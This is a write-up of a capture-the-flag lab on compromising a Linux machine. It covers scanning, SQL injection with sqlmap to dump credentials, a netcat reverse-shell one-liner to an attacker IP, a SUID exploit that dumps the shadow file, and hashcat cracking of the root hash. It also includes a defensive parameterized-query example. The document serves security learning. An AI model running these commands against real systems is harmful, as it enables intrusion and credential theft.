A guided room taking you through infiltrating and exploiting a Linux system.
Start with Rustscan to find the open ports and pipe the results into nmap for service detection.
❯ rustscan -a 10.10.5.177 -- -sC -sV -oN nmap_results
Ports 22 and 80 seem to be the only ones open.
What stands out here: since SSH is rarely a target for extensive enumeration, we can try enumerating the web server for hidden directories instead.
❯ gobuster dir -u "http://10.10.5.177/" --wordlist=/usr/share/dirbuster/directory-list-2.3-medium.txt -t 75 -x "php,txt,html"
Tag | Meaning
---|---
dir | Directory search mode
-u | URL to enumerate
--wordlist | The wordlist to use for enumeration
-t | The number of concurrent threads to use
-x | The file extensions to enumerate
Thoughts: I usually only enumerate directories; not being able to find a directory made me realise I should enumerate file extensions too.
On enumerating file extensions, we get a directory.
Since this is a PHP login form, and login forms that build queries from user input are a common place for SQLi, let's check whether it is vulnerable.
On entering a single quote (') in the Username field we get an error, which confirms the earlier suspicion.
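Why a lone quote produces that error, and what the fix looks like, as an added example that is not the room's code: a constructed in-memory table stands in for the site's user table, and the query shape, column names and sample credentials are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the login form's user table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-password')")
    return conn


def login_concatenated(conn, username, password):
    """Vulnerable pattern: user input is pasted straight into the SQL text.
    A lone quote unbalances the string literal, so the query fails to parse,
    which is the error seen on the login page."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened pattern: placeholders keep the input as data, never as SQL,
    so a quote is just a character compared against the column."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def probe(login_fn, username, password):
    """Return 'error' when the query cannot be parsed, else the login result."""
    try:
        return login_fn(make_db(), username, password)
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    for name, fn in (("concatenated", login_concatenated),
                     ("parameterized", login_parameterized)):
        print(name, "valid creds:", probe(fn, "admin", "constructed-password"))
        print(name, "single quote:", probe(fn, "'", "x"))
```

A quote that turns into a database error in the form is the signal that input reaches the query as SQL; with placeholders the same input simply fails to match a user.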
To do the injection, let's use sqlmap to test the form and find the credentials.
❯ sqlmap -u "http://10.10.5.177/administrator.php" --forms --dump
Tag | Meaning
---|---
-u | Specifies the URL to attack
--forms | Automatically selects the <form> elements from the page
--dump | Retrieves data from the database once the SQLi is found
On running sqlmap we find the required credentials.
Thoughts: This was my first brush with sqlmap, and trying to understand its working was quite insightful.
Once we log in with the creds we see that we can run arbitrary commands through the web server. Really weird for this to happen, but I'll roll with it.
Now that we can run commands here, we can list the files in the current directory using ls, or see the users on the system using cat /etc/passwd.
It's better to get a proper shell on the system now. Let's try one of the reverse shell payloads from highoncoffee. The OpenBSD netcat payload works here:
mkfifo /tmp/lol;nc 10.11.17.66 1337 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol
Thoughts: It took me some time to figure out that I just needed to use another payload to get things to work. I should try to use different things when I get stuck.
To find the file where the password is stored, as instructed by the room, we use the find command.
Thoughts: Trying to find this file was a bit annoying because I was unable to properly use the find command to retrieve the file. I need to do more practice in finding files and learn this command fully.
Inside this file is the required SSH password.
Logging in with SSH:
❯ ssh pingu@10.10.5.177
Now that we have a proper shell on the machine, we should enumerate it using LinEnum.sh. My favourite way to do this is to host a web server in a local directory containing the script and download it onto the target machine.
After getting the script onto the target, run it to find the juicy stuff, including the interesting SUID file.
Thoughts: All these are things I am a bit more familiar with so it was more fun.
As the room instructs, the SUID binary loads the shadow file into memory, expects 32 characters of input and then exits. Following the instructions, we exploit the binary.
The binary exploitation ultimately leads to the contents of the shadow file, including the root hash, being dumped.
We can run this hash through hashcat (mode 1800 is sha512crypt, attack mode 0 is a straight dictionary attack) using:
❯ hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt
And this gives us the final password!
Thoughts on the room: This was quite an interesting room; I am definitely going to read up on binary exploitation later. Apart from that, I've realised that I should just keep doing more rooms.